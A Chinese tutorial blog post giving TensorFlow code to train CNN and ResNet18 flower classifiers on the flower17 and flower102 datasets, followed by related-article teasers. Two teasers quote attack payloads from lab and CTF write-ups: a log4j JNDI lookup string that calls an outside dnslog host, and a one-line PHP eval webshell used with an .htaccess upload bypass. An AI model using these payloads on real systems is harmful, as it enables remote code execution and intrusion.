使用CNN或resnet,分别在flower5,flower17,flower102数据集上实现花朵识别分类-附源码-免费

news2025/1/15 6:39:51

前言

使用cnn和resnet实现了对flower5,flower17,flower102数据集上实现花朵识别分类。也就是6份代码,全部在Gitee仓库里,记得点个start支持谢谢。

本文给出flower17在cnn网络实现,flower102在resnet网络实现的代码。其余在Gitee仓库中,还附有学习其他博主的模型的代码。

前置准备

理论:一定的深度学习,卷积神经网络的理论知识学习,python基础语法。

环境:Anaconda3安装,python安装,pycharm安装,相应的依赖包安装,如TensorFlow,matplotlib,pillow,pandas等。

数据集

介绍

flower5

flower17

flower102

下载

https://gitee.com/karrysmile/flower_data.git

每个flower.*文件夹就是一个数据集。

每个数据集中包含train,valid文件夹,分别作训练集和数据集用。

训练集和数据集文件架构相同,包含文件夹相同,同种花归为一个文件夹,以花名为文件夹名。

运行要求

我的电脑配置是

flower5,17可以在本地运行,flower102建议用显卡跑。没有显卡的可以到腾讯云或其他平台,租一个服务器来跑,我租了一个Tesla V4显卡来跑,1.6r一小时,用钱换时间。

代码

代码思路

  1. 导入数据集
  2. 数据预处理
  3. 构建模型
  4. 训练模型
  5. 调参优化
  6. 结果可视化
  7. 模型复用

代码解释

以flower17数据集的cnn模型,flower102数据集的resnet模型作为举例,其余在文末的仓库里。

每行代码都加了注释,看注释吧。

# flower17_cnn
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import matplotlib.pyplot as plt
import sys
import datetime
from keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint
# 打印环境版本信息 作者信息
print("@Author karrysmile")
print("@Date "+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print("Python version:"+sys.version)
print("TensorFlow version:", tf.__version__)

# 设置GPU设备 有的话动态增长
physical_devices = tf.config.list_physical_devices('GPU')
if physical_devices:
    tf.config.experimental.set_memory_growth(physical_devices[0], True)

# 该数据集总共1360个文件,其中1190用于训练集,170用于验证集

# 数据准备和增强
# 文件目录
train_data_dir = 'flower_data/train'
valid_data_dir = 'flower_data/valid'
# 批处理大小
batch_size = 32
# 每张图片的重塑大小
image_size = (128, 128)

# 使用 ImageDataGenerator 对图像进行数据增强
train_datagen = ImageDataGenerator(
    # 设定数据增强的模式参数
    # 将图像的像素值缩放到 [0, 1] 范围内。
    rescale=1./255,
    # 随机旋转图像30度
    rotation_range=30,
    # 随机水平平移20%
    width_shift_range=0.2,
    # 随机垂直平移20%
    height_shift_range=0.2,
    # 随机应用错切变换20度
    shear_range=0.2,
    # 随机缩放图像尺寸20%
    zoom_range=0.2,
    # 随机进行水平翻转
    horizontal_flip=True,
    # 随机亮度变化20%
    brightness_range=[0.8, 1.2],  # 亮度范围
)
# 验证集只把图像的像素值缩放到 [0, 1] 范围内。
test_datagen = ImageDataGenerator(rescale=1./255)

# 应用数据增强模型,设定训练数据,从文件目录读取图像
train_generator = train_datagen.flow_from_directory(
    # 训练集目录
    train_data_dir,
    # 图片重塑大小
    target_size=image_size,
    # 批处理张数
    batch_size=batch_size,
    # 分类模型 - 多分类
    class_mode='categorical',
)
# 应用数据增强模型,设定验证集数据,从文件目录读取图像
valid_generator = test_datagen.flow_from_directory(
    # 验证集目录
    valid_data_dir,
    # 重塑图像大小
    target_size=image_size,
    # 批处理数
    batch_size=batch_size,
    # 设定分类模型
    class_mode='categorical',
)

# 搭建CNN模型
model = tf.keras.models.Sequential([
    # 卷积层,32个filter,卷积核大小为3x3,激活函数为relu,输入形状为(128, 128, 3),长x宽x3通道(RGB)
    tf.keras.layers.Conv2D(32, (3, 3), activation='relu', input_shape=(128, 128, 3)),
    # 最大池化层 提取主要特征,减少计算量
    tf.keras.layers.MaxPooling2D(2, 2),
    
    tf.keras.layers.Conv2D(32, (3, 3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2, 2),
    # 卷积层,64个filter,卷积核大小3x3,激活函数为relu
    tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2, 2),
    # 最大池化层 提取主要特征,减少计算量
    tf.keras.layers.BatchNormalization(),
    # 卷积层,128个filter,卷积核大小为3x3,激活函数为relu
    tf.keras.layers.Conv2D(128, (3, 3), activation='relu'),
    tf.keras.layers.BatchNormalization(),
    tf.keras.layers.MaxPooling2D(2, 2),
    # 将多维输入数据展平为一维向量,以便连接到全连接层
    tf.keras.layers.Flatten(),
    # 全连接层,512维,激活函数为relu
    tf.keras.layers.Dense(512, activation='relu'),
    # dropout 30%的数据 避免过拟合
    tf.keras.layers.Dropout(0.3),
    # 全连接层,输出,17个维度对应17种花,激活函数为softmax,用于多分类
    tf.keras.layers.Dense(17, activation='softmax')
])

# 设定优化器 Adam 初始学习率为0。001
optimizer = tf.keras.optimizers.Adam(learning_rate=0.001)
# 编译模型,优化器选择Adam,损失函数为交叉熵损失函数,适用于多类别分类问题,准确率作为评估模型性能的指标
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
# 打印出模型的摘要信息,包括每一层的名称、输出形状和参数数量等
model.summary()


# 训练模型
# 检查点,根据验证准确率,每个epoch判断要不要保存最好的模型  保存整个模型
checkpoint = ModelCheckpoint("model", monitor='val_accuracy', verbose=1,save_best_only=True, save_weights_only=False, mode='auto', save_freq='epoch')
# 早退,当设定的n个epoch发生,验证准确率都没有发生提升,就退出
early = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=50, verbose=1, mode='auto')
# 减少学习率 检测val_loss 如果5个epoch没有发生更好的变化,就变为原来的二分之一,避免过拟合
reduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=5, mode='auto',factor=0.5)
# 模型训练,结果保存到history
history = model.fit(
    # 训练数据放进来
    train_generator,
    # 计算每个epoch的数量(总长度 除以 批处理大小)
    steps_per_epoch=train_generator.samples // batch_size,
    # 要跑的轮数
    epochs=1000,
    # 批处理大小
    batch_size=batch_size,
    validation_data=valid_generator,
    validation_steps=valid_generator.samples // batch_size,
    # 回调函数,用于监测和调整超参数
    callbacks=[reduce_lr,checkpoint,early]
)
# 保存模型
model.save('flower17_cnn.h5')
model.save('flower17_cnn')
# 用全部测试数据评估模型
test_loss, test_acc = model.evaluate(valid_generator, verbose=2)
print('\nTest accuracy:', test_acc)

# 绘制训练和测试损失
plt.plot(history.history['loss'], label='train_loss')
plt.plot(history.history['val_loss'], label='valid_loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()

# 绘制训练和测试准确率
plt.plot(history.history['accuracy'], label='train_acc')
plt.plot(history.history['val_accuracy'], label='valid_acc')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()

# flower102_resnet18
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import matplotlib.pyplot as plt
import sys
import datetime
from keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint
# 打印环境版本信息 作者信息
print("@Author karrysmile")
print("@Date "+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print("Python version:"+sys.version)
print("TensorFlow version:", tf.__version__)

# 设置GPU设备
physical_devices = tf.config.list_physical_devices('GPU')
if physical_devices:
    tf.config.experimental.set_memory_growth(physical_devices[0], True)

# 数据准备和增强
train_data_dir = 'flower_data/train'
valid_data_dir = 'flower_data/valid'
batch_size = 32
image_size = (128, 128)

train_datagen = ImageDataGenerator(
    rescale=1./255,
    rotation_range=30,
    width_shift_range=0.2,
    height_shift_range=0.2,
    shear_range=0.2,
    zoom_range=0.2,
    horizontal_flip=True,
    brightness_range=[0.8, 1.2],  # 亮度范围
)

valid_datagen = ImageDataGenerator(rescale=1./255)

train_generator = train_datagen.flow_from_directory(
    train_data_dir,
    target_size=image_size,
    batch_size=batch_size,
    class_mode='categorical',
)

valid_generator = valid_datagen.flow_from_directory(
    valid_data_dir,
    target_size=image_size,
    batch_size=batch_size,
    class_mode='categorical',
)

def ConvLayer(x,filters,kernel_size,stride):
    x = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride,padding='same')(x)
    x = tf.keras.layers.BatchNormalization(epsilon=1e-5,momentum=0.1)(x)
    return x

def ResNetBlock(input,filters,kernel_size,strides):
    x = ConvLayer(input,filters,kernel_size,strides)
    x = tf.keras.layers.Activation('relu')(x)
    x = ConvLayer(x,filters,kernel_size,(1,1))

    if strides != (1,1):
        residual = ConvLayer(input,filters,(1,1),strides)
    else:
        residual = input

    x = x+residual
    x = tf.keras.layers.Activation('relu')(x)
    return x

def ResNet(input_size):
    # head
    x = ConvLayer(input_size,64,(7,7),(2,2))
    x = tf.keras.layers.Activation('relu')(x)
    x = tf.keras.layers.MaxPooling2D(3,strides=2,padding='same')(x)
    # layer1-------------------
    x = ResNetBlock(x,64,(3,3),(1,1))
    x = ResNetBlock(x,64,(3,3),(1,1))
    # layer2-------------------
    x = ResNetBlock(x,128,(3,3),(2,2))
    x = ResNetBlock(x,128,(3,3),(1,1))
    # layer3-------------------
    x = ResNetBlock(x,256,(3,3),(2,2))
    x = ResNetBlock(x,256,(3,3),(1,1))
    # layer4-------------------
    x = ResNetBlock(x,512,(3,3),(2,2))
    x = ResNetBlock(x,512,(3,3),(1,1))
    # tail
    x = tf.keras.layers.AvgPool2D(1)(x)
    x = tf.keras.layers.Flatten()(x)
    x = tf.keras.layers.Dense(512, activation='relu')(x)
    output = tf.keras.layers.Dense(102, activation='softmax')(x)
    return output

inputs = tf.keras.Input((128,128,3))
outputs = ResNet(inputs)
model = tf.keras.Model(inputs,outputs)

optimizer = tf.keras.optimizers.Adam(learning_rate=0.001)
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
model.summary()
# 训练模型
checkpoint = ModelCheckpoint("model", monitor='val_accuracy', verbose=1,save_best_only=True, save_weights_only=False, mode='auto', save_freq='epoch')
early = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=10, verbose=1, mode='auto')
reduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=3, mode='auto',factor=0.2)
history = model.fit(
    train_generator,
    steps_per_epoch=train_generator.samples // batch_size,
    epochs=50,
    batch_size=batch_size,
    validation_data=valid_generator,
    validation_steps=valid_generator.samples // batch_size,
    callbacks=[reduce_lr,checkpoint,early]
)

# 保存为h5文件
model.save('flower102_resnet.h5')
# 保存为文件夹形式,可以注释掉
model.save('flower102_resnet')

test_loss, test_acc = model.evaluate(valid_generator, verbose=2)
print('\nTest accuracy:', test_acc)

# 绘制训练和测试损失
plt.plot(history.history['loss'], label='train_loss')
plt.plot(history.history['val_loss'], label='valid_loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()

# 绘制训练和测试准确率
plt.plot(history.history['accuracy'], label='train_acc')
plt.plot(history.history['val_accuracy'], label='valid_acc')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()

运行结果

flower17_cnn

flower102_resnet18

随机加载一张图片来验证

在根目录下放置一张test.jpg,加载这张图片并输出验证结果。

import keras.models
import numpy as np
import matplotlib.pyplot as plt
from tensorflow.keras.preprocessing import image

# 加载SavedModel格式的模型
loaded_model = keras.models.load_model('flower17_cnn')

# 进行预测等操作

# 读取测试图片
img_path = 'test.jpg'  # 测试图片的路径
img = image.load_img(img_path, target_size=(128, 128))
img_array = image.img_to_array(img)
img_array = np.expand_dims(img_array, axis=0)
img_array /= 255.

# 进行预测
prediction = loaded_model.predict(img_array)
predicted_class_index = np.argmax(prediction)
class_labels = ['bluebell', 'buttercup', 'colts_foot', 'cowslip', 'crocus', 'daffodil', 'daisy', 'dandelion', 'fritillary', 'iris', 'lily_valley', 'pansy', 'snowdrop', 'sunflower', 'tigerlily', 'tulip', 'windflower']
predicted_class = class_labels[predicted_class_index]

print("当前图片预测的类型是:--->>>", predicted_class)

# 显示预测结果
plt.imshow(img)
plt.title('Predicted: {}'.format(predicted_class))
plt.axis('off')
plt.show()

运行结果

总结

  1. 真的需要算力,不然很多时间都留在等待上面,但又恰恰因为等待,可以有更深的思考(所以需要一定时间的等待,但不能过长)
  2. 不要随意更新或者卸载依赖包,会容易影响整个环境的包之间的版本不匹配
  3. 越深层的网络,需要考虑的东西越多,如果不考虑,仅仅是堆深度,可能根本学不到东西,甚至比原来更差。
  4. 图片进行垂直翻转,会出现验证率下降的问题。待验证和解决。
  5. 最好是自动监控与停止,多参考别人的代码。

参考文章

ResNet18详细原理(含tensorflow版源码)_resnet18网络结构-CSDN博客

(四)pytorch图像识别实战之用resnet18实现花朵分类(代码+详细注解)_pytorch中调用resnet18进行分类-CSDN博客

TensorFlow指定GPU使用及监控GPU占用情况_taskflow gpu-CSDN博客

Gitee仓库

包含两种模型(cnn,resnet)在三个数据集(flower5,17,102)上的六个实现,用ipynb存储。

resnet附上了其他作者的迁移预训练结果的代码。文件名包含example的代码不是本人写的。

https://gitee.com/karrysmile/flowers.git

有用请点个star,按赞收藏关注。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1639438.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

BJFUOJ-C++程序设计-实验3-继承和虚函数

A TableTennisPlayer 答案&#xff1a; #include<iostream> #include<cstring> using namespace std;class TableTennisPlayer{ private:string firstname;string lastname;bool hasTable;public:TableTennisPlayer(const string &, const string &, bool…

VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了&#xff0c;环境搭建不讲&#xff0c;网上其他文章很好。 访问该环境&#xff1a; POC 构造&#xff08;任选其一&#xff09;&#xff1a; ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是…

docker 指定根目录 迁移根目录

docker 指定根目录 1、问题描述2、问题分析3、解决方法3.1、启动docker程序前就手动指定docker根目录为一个大的分区(支持动态扩容)&#xff0c;事前就根本上解决根目录空间不够问题3.1.0、方法思路3.1.1、docker官网安装文档3.1.2、下载docker安装包3.1.3、安装docker 26.1.03…

JavaEE >> Spring MVC(2)

接上文 本文介绍如何使用 Spring Boot/MVC 项目将程序执行业务逻辑之后的结果返回给用户&#xff0c;以及一些相关内容进行分析解释。 返回静态页面 要返回一个静态页面&#xff0c;首先需要在 resource 中的 static 目录下面创建一个静态页面&#xff0c;下面将创建一个静态…

[1673]jsp在线考试管理系统Myeclipse开发mysql数据库web结构java编程计算机网页项目

一、源码特点 JSP 在线考试管理系统是一套完善的java web信息管理系统&#xff0c;对理解JSP java编程开发语言有帮助&#xff0c;系统具有完整的源代码和数据库&#xff0c;系统主要采用B/S模式开发。开发环境为TOMCAT7.0,Myeclipse8.5开发&#xff0c;数据库为Mysql5.0&…

[MRCTF2020]你传你呢 1

上传一个文件 图片木马 新建一个图片木马&#xff0c;这里我命名为a.php&#xff0c;名字需和待会上传的.htaccess一致 GIF89a <script languagephp>eval($_REQUEST["cmd"])</script>抓包上传的a.php文件&#xff0c;修改两个地方 新建一个.htacces…

Neo4j v5 中 Cypher 的变化

How Cypher changed in Neo4j v5 Neo4j v5 中 Cypher 的变化 几周前&#xff0c;Neo4j 5 发布了。如果你像我一样&#xff0c;在 Neo4j 4 的后期版本中忽略了所有的弃用警告&#xff0c;你可能需要更新你的 Cypher 查询以适应最新版本的 Neo4j。幸运的是&#xff0c;新的 Cyp…

confluence 设置https代理

使用nginx反待confluence并开启https后&#xff0c;登录confluence会一直提示&#xff1a;scheme、proxyName、proxyPort设置错误。 解决办法&#xff1a; find / -name server.xmlvi /opt/atlassian/confluence/conf/server.xml HTTP反代配置 HTTPS反代配置

小程序地理位置接口权限直接抄作业

小程序地理位置接口有什么功能&#xff1f; 随着小程序生态的发展&#xff0c;越来越多的小程序开发者会通过官方提供的自带接口来给用户提供便捷的服务。但是当涉及到地理位置接口时&#xff0c;却经常遇到申请驳回的问题&#xff0c;反复修改也无法通过&#xff0c;给的理由也…

【大模型应用】使用 Windows 窗体作为 Copilot 应用程序的 Ollama AI 前端(测试llava视觉问答)...

项目 “WinForm_Ollama_Copilot” 是一个使用Windows Forms作为前端的Ollama AI Copilot应用程序。这个项目的目的是提供一个用户界面(UI)&#xff0c;通过它&#xff0c;用户可以与Ollama AI进行交互。以下是该项目的一些关键特点和功能&#xff1a; Ollama Copilot: 这是一个…

[方法] Unity 实现仿《原神》第三人称跟随相机 v1.0

参考网址&#xff1a;【Unity中文课堂】RPG战斗系统Plus 在Unity游戏引擎中&#xff0c;实现类似《原神》的第三人称跟随相机并非易事&#xff0c;但幸运的是&#xff0c;Unity为我们提供了强大的工具集&#xff0c;其中Cinemachine插件便是实现这一目标的重要工具。Cinemachi…

Rust Turbofish 的由来

0x01 什么是 Turbofish 我们运行如下 Rust Snippet&#xff1a; fn main() {let numbers: Vec<i32> vec![1, 2, 3, 4, 5, 6, 7, 8, 9, 10];let even_numbers numbers.into_iter().filter(|n| n % 2 0).collect();println!("{:?}", even_numbers); }不出意…

什么是UDP反射放大攻击,有什么安全措施可以防护UDP攻击

随着互联网的飞速发展和业务复杂性的提升&#xff0c;网络安全问题日益凸显&#xff0c;其中分布式拒绝服务&#xff08;DDoS&#xff09;攻击成为危害最为严重的一类网络威胁之一。 近些年&#xff0c;网络攻击越来越频繁&#xff0c;常见的网络攻击类型包括&#xff1a;蠕虫…

TS学习-泛型基础

目录 1&#xff0c;介绍1&#xff0c;在函数中使用2&#xff0c;在类型别名&#xff0c;接口中使用3&#xff0c;在类中使用 2&#xff0c;泛型约束3&#xff0c;多泛型4&#xff0c;举例实现 Map 1&#xff0c;介绍 泛型相当于是一个类型变量&#xff0c;有时无法预先知道具体…

【每日刷题】Day30

【每日刷题】Day30 &#x1f955;个人主页&#xff1a;开敲&#x1f349; &#x1f525;所属专栏&#xff1a;每日刷题&#x1f34d; &#x1f33c;文章目录&#x1f33c; 1. 牛牛的链表添加节点_牛客题霸_牛客网 (nowcoder.com) 2. 牛牛的链表删除_牛客题霸_牛客网 (nowcoder…

Django整合多种认证方式

承接上一篇&#xff1a;Django知识点总结-CSDN博客 目录 25.使用 Django REST framework实现用户认证和授权 26.通过djangorestframework-simplejwt使用JWT(JSON Web Token) 27.使用django-auth-ldap进行用户认证 28. 使用django-cas-ng实现集中认证及实现单点登录 29. …

c# winform快速建websocket服务器源码 wpf快速搭建websocket服务 c#简单建立websocket服务 websocket快速搭建

完整源码下载----->点击 随着互联网技术的飞速发展&#xff0c;实时交互和数据推送已成为众多应用的核心需求。传统的HTTP协议&#xff0c;基于请求-响应模型&#xff0c;无法满足现代Web应用对低延迟、双向通信的高标准要求。在此背景下&#xff0c;WebSocket协议应运而生…

C++函数重载之类型引用和类型本身

在C中&#xff0c;当我们讨论类型引用&#xff08;也称为引用类型&#xff09;与类型本身被视为“同一个特征标”&#xff08;signature&#xff09;时&#xff0c;我们实际上是在讨论引用类型在函数重载解析&#xff08;function overload resolution&#xff09;和模板参数推…

Github 2024-05-02 Go开源项目日报 Top10

根据Github Trendings的统计,今日(2024-05-02统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下: 开发语言项目数量Go项目10PureBasic项目1Kubernetes: 容器化应用程序管理系统 创建周期:3618 天开发语言:Go协议类型:Apache License 2.0Star数量:106913 个…

C#知识|Dictionary泛型集合的使用总结

哈喽,你好,我是雷工! 以下是C#Dictionary泛型集合的学习笔记。 01 Dictionary泛型集合 1.1、Dictionary<K,V>通常称为字典, 1.2、其中<K,V>是自定义的,用来约束集合中元素类型。 1.3、在编译时检查类型约束, 1.4、无需装箱拆箱操作, 1.5、操作与哈希表(Ha…